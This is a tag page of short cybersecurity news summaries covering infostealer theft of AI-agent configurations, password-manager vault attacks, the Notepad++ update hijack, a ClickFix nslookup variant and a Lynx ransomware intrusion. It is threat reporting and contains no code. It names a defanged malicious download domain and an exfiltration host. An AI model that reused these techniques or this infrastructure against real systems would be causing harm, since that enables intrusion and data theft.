Threat actors created disposable Atlassian Jira Cloud instances and abused Jira Automation and the platform’s trusted atlassian.net email reputation to deliver automated, localized spam and targeted lures to recipients across multiple languages and sectors. The campaigns used integrated email-sending services and Keitaro TDS redirects to funnel victims to investment scams and…
Tag: SSO
![Cybersecurity News | Daily Recap [16 Feb 2026]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [16 Feb 2026]")
Daily Recap, researchers report a live ClawdBot infection that exfiltrates OpenClaw configurations (including private keys) enabling AI‑agent impersonation, while CTM360 warns of a global campaign distributing Lumma Stealer and a trojanized Ninja Browser via Google Groups and weaponized ad fraud. Patch alerts follow, with BeyondTrust CVE-2026-1731 requiring patching within 3 days, Google Chrome’s high‑severity zero‑day CVE-2026-2441 being fixed across platforms, Windows 11 boot issues addressed by KB5077181, Lotus Blossom hijacking Notepad++ updates to deploy Chrysalis and Cobalt Strike in high‑value targets, and VoidLink campaigns affecting technology and financial sectors alongside ShinyHunters’ Canada Goose data leak. #ClawdBot #OpenClaw #LummaStealer #NinjaBrowser #ModeloRAT #NotepadPlusPlus #Chrysalis #CobaltStrike #LotusBlossom #VoidLink #ShinyHunters #CanadaGoose #BeyondTrust #ChromeZeroDay
Researchers at ETH Zurich analyzed popular cloud-based password managers under a malicious-server (zero-knowledge) threat model and found multiple ways attackers could compromise users’ vaults. They demonstrated full vault compromise for Bitwarden and LastPass, shared-vault compromise for Dashlane, and attacks targeting account recovery, SSO, sharing, and vault integrity, while vendors have issued…
The Federal Government filed a three-count criminal charge against former Kaduna State governor Nasir El-Rufai, accusing him of unlawfully intercepting National Security Adviser Nuhu Ribadu’s communications and failing to report related offenses. The case, brought by the DSS under provisions of the Cybercrimes (Amendment) Act 2024 and the Nigerian Communications Act…
There were 10 defacement incidents targeting websites in Indonesia (domains ending in .id), affecting multiple school and library sites across the country. The attackers involved are Maria and Ghost Haxor (Maria responsible for seven incidents and Ghost Haxor for three) #Indonesia…
Google released the first Android 17 beta with a range of privacy, security, and developer-focused improvements across performance, media, camera, and connectivity. Major security changes include deprecation of the usesCleartextTraffic attribute (blocking cleartext by default without a network security config), a public SPI for HPKE hybrid cryptography, certificate transparency enabled by…
A threat actor using the handle “Angel_Batista” claims to be selling the databases of Russian EdTech platform Foxford, alleging a breach impacting approximately 13.6 million customers. The listing reportedly appeared on Tor and, if verified, would be one of the largest education-sector data breaches reported this year. #Angel_Batista #Foxford…
OpenClaw configuration and memory files containing API keys, authentication tokens, private keys, and agent memories were exfiltrated in the first reported in-the-wild infostealer compromise, likely a Vidar variant, enabling potential full compromise of a user’s AI agent identity. Researchers warn infostealers will increasingly target agent frameworks as they become widespread, and Tenable also disclosed a separate max-severity remote flaw in Nanobot (CVE-2026-2577) that was patched. #OpenClaw #Vidar #HudsonRock #Nanobot #CVE-2026-2577
Since last year, Western websites have experienced a sustained surge of automated traffic traced to China and Singapore, with analytics showing near-zero engagement and behavior consistent with bots. Much of the traffic appears routed through servers linked to Tencent and repeatedly geolocated to Lanzhou, prompting speculation about large-scale scraping—possibly for AI…
Microsoft and others reported exploitation of Internet-facing SolarWinds Web Help Desk servers that enabled multi-stage intrusions beginning in December 2025, involving remote MSI installations, abuse of RMM tooling, and credential dumping. Elastic and Microsoft observed use of legitimate tools (Velociraptor, Cloudflared, QEMU) for persistence and tunneling, and Elastic published detection and prevention rules to detect the activity. #SolarWindsWHD #Velociraptor
ShinyHunters claims to have published a 1.67 GB dataset containing over 600,000 historical Canada Goose customer records with names, contact details, partial payment card information, IP addresses, and order histories. Canada Goose says it has found no evidence of a breach of its own systems, is reviewing the dataset’s accuracy and scope, and the exposed data could still be abused for phishing, social engineering, fraud, and profiling of high-value customers. #ShinyHunters #CanadaGoose
Unit 42 revealed that Lotus Blossom, a state-sponsored group, compromised Notepad++’s shared hosting to hijack update traffic and deliver targeted malicious updates between June and December 2025. The attackers used an Adversary-in-the-Middle capability to selectively serve payloads—deploying the Chrysalis backdoor via DLL side-loading or a Cobalt Strike Beacon via injected Lua…
CTM360 reports an active global campaign abusing over 4,000 malicious Google Groups and 3,500 Google-hosted URLs to distribute credential‑stealing malware and establish persistent access on compromised devices. Windows users are targeted with an oversized, password‑protected archive delivering the Lumma infostealer, while Linux users are redirected to a trojanized Chromium “Ninja Browser” that silently installs malicious extensions and persistence mechanisms. #LummaStealer #NinjaBrowser
Microsoft disclosed a new ClickFix variant that tricks users into running nslookup via the Windows Run dialog and cmd.exe to perform DNS-based staging and fetch a second-stage payload. The chain downloads a ZIP from azwsappdev[.]com that leads to a Python script, VBScript and ModeloRAT persistence, while related campaigns use CastleLoader, Lumma…
The intrusion began with a valid RDP login using pre-compromised credentials and progressed through rapid discovery, lateral movement, and persistent account creation before data exfiltration and a final ransomware deployment. The actor exfiltrated archives to temp.sh and deployed Lynx ransomware, leveraging infrastructure tied to Railnet LLC/Virtualine. #Lynx #RailnetLLC